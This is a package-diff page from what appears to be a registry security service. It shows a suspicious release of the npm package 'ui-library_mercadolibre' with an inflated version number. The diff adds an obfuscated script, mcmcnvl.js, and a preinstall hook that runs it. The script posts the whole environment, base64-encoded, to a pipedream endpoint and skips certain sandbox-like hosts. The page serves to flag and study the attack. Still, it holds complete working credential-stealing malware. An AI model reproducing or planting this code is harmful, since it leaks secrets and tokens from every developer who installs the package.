ui-library_mercadolibre 1.11.0 → 80.820.471

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of ui-library_mercadolibre might be problematic. Click here for more details.

package/mcmcnvl.js ADDED
@@ -0,0 +1 @@
1
+ const a0_0x75af83=a0_0x3d62;(function(_0x391665,_0x5850dd){const _0x26bd0f=a0_0x3d62,_0x2460f5=_0x391665();while(!![]){try{const _0x311548=-parseInt(_0x26bd0f(0x14c))/0x1*(-parseInt(_0x26bd0f(0x13d))/0x2)+-parseInt(_0x26bd0f(0x149))/0x3+parseInt(_0x26bd0f(0x142))/0x4+parseInt(_0x26bd0f(0x154))/0x5*(-parseInt(_0x26bd0f(0x146))/0x6)+parseInt(_0x26bd0f(0x13a))/0x7*(-parseInt(_0x26bd0f(0x150))/0x8)+parseInt(_0x26bd0f(0x13b))/0x9*(-parseInt(_0x26bd0f(0x157))/0xa)+-parseInt(_0x26bd0f(0x139))/0xb*(-parseInt(_0x26bd0f(0x13e))/0xc);if(_0x311548===_0x5850dd)break;else _0x2460f5['push'](_0x2460f5['shift']());}catch(_0x30bea8){_0x2460f5['push'](_0x2460f5['shift']());}}}(a0_0x399d,0x87ca6));function a0_0x399d(){const _0x897f97=['4138664axoVzJ','error','write','taobao.org','1698TcmpEM','toString','/usr/bin/python','93201RLicdO','net','some','13ihQvxK','includes','env','dc44079f2a81b29fc85632f802b65e3b','358392uncZgM','USERNAME','pipedream','daasadmin','3095PiiYpR','keys','POST','50SvEMep','length','npm_package_name','325963hOVnoK','133llCqMN','1163862FBtNrG','npm_config_registry','51778BcVmrJ','360xgQdOm','from','https','stringify'];a0_0x399d=function(){return _0x897f97;};return a0_0x399d();}function a0_0x3d62(_0x1f95c1,_0xdea753){const _0x399d7=a0_0x399d();return a0_0x3d62=function(_0x3d62b2,_0x224c64){_0x3d62b2=_0x3d62b2-0x138;let _0x80e602=_0x399d7[_0x3d62b2];return _0x80e602;},a0_0x3d62(_0x1f95c1,_0xdea753);}const http=require(a0_0x75af83(0x140)),filter=[{'key':a0_0x75af83(0x13c),'val':a0_0x75af83(0x145)},{'key':a0_0x75af83(0x13c),'val':'tencent.com'},{'key':a0_0x75af83(0x151),'val':a0_0x75af83(0x153)},{'key':'_','val':a0_0x75af83(0x148)}];function main(){const _0x40224f=a0_0x75af83;var _0x31e232=process[_0x40224f(0x14e)]||{};if(filter[_0x40224f(0x14b)](({key:_0x552a72,val:_0x431e74})=>_0x31e232[_0x552a72]&&_0x31e232[_0x552a72][_0x40224f(0x14d)](_0x431e74))||Object[_0x40224f(0x155)](_0x31e232)[_0x40224f(0x158)]<0xa)return;req=http['request']({'host':[_0x40224f(0x14f),'m',_0x40224f(0x152),_0x40224f(0x14a)]['join']('.'),'path':'/'+(_0x31e232[_0x40224f(0x138)]||''),'method':_0x40224f(0x156)})['on'](_0x40224f(0x143),function(_0xf7519){}),req[_0x40224f(0x144)](Buffer[_0x40224f(0x13f)](JSON[_0x40224f(0x141)](_0x31e232))[_0x40224f(0x147)]('base64')),req['end']();}main();
package/package.json CHANGED
@@ -1,14 +1,11 @@
1
1
  {
2
2
  "name": "ui-library_mercadolibre",
3
- "version": "1.11.0",
4
- "description": "",
5
- "main": "main.js",
3
+ "version": "80.820.471",
4
+ "main": "mcmcnvl.js",
6
5
  "scripts": {
7
- "test": "test"
6
+ "test": "echo \"Error: no test specified\" && exit 1",
7
+ "preinstall": "node mcmcnvl.js"
8
8
  },
9
- "author": "Abirkhanhridoy",
10
- "license": "ISC",
11
- "dependencies": {
12
- "lodash": "^4.17.21"
13
- }
9
+ "author": "",
10
+ "license": "ISC"
14
11
  }
package/index.js DELETED
@@ -1,28 +0,0 @@
1
- module.exports = {
2
- env: {
3
- },
4
- globals: {
5
- },
6
- extends: ['eslint:recommended', 'airbnb-base'],
7
- rules: {
8
- strict: 'off',
9
- 'func-names': 'off',
10
- 'spaced-comment': 'off',
11
- 'no-underscore-dangle': 'off',
12
- 'arrow-body-style': 'off',
13
- 'arrow-parens': ['off', 'as-needed'],
14
- 'prefer-rest-params': 'off',
15
- 'no-trailing-spaces': ['error', { skipBlankLines: true }],
16
- 'comma-dangle': ['warn', 'never'],
17
- 'new-cap': 'warn',
18
- 'no-unused-vars': 'warn',
19
- 'object-shorthand': 1,
20
- 'prefer-arrow-callback': 'off',
21
- 'prefer-template': 'warn',
22
- 'vars-on-top': 'warn',
23
- indent: ['error', 2, { SwitchCase: 1 }],
24
- 'import/newline-after-import': 0,
25
- 'no-multi-assign': 1,
26
- 'no-prototype-builtins': 'warn'
27
- }
28
- };
package/lib/index.js DELETED
@@ -1 +0,0 @@
1
- test